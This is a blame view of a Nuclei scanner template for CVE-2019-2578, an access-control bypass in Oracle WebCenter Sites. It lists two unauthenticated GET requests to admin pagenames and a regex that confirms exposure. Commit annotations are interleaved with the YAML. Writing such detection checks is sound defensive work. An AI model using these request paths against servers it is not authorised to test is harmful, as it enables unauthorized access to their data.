daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2019/CVE-2019-2578.yaml

27 lines
965 B
YAML
Raw Normal View History

create check for cve-2019-2578
2021-11-06 00:24:41 +00:00
id: CVE-2019-2578
info:
name: Broken Access Control Oracle WebCenter Sites
author: leovalcante
severity: high
misc updates
2021-11-06 08:11:08 +00:00
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
create check for cve-2019-2578
2021-11-06 00:24:41 +00:00
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
misc updates
2021-11-06 08:11:08 +00:00
tags: cve,cve2019,oracle,wcs,auth-bypass
create check for cve-2019-2578
2021-11-06 00:24:41 +00:00
requests:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
misc updates
2021-11-06 08:11:08 +00:00
Host: {{Hostname}}
create check for cve-2019-2578
2021-11-06 00:24:41 +00:00
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
misc updates
2021-11-06 08:11:08 +00:00
Host: {{Hostname}}
stop-at-first-match: true
create check for cve-2019-2578
2021-11-06 00:24:41 +00:00
matchers:
- type: regex
part: body
misc updates
2021-11-06 08:11:08 +00:00
regex:
- '<script[\d\D]*<throwexception/>'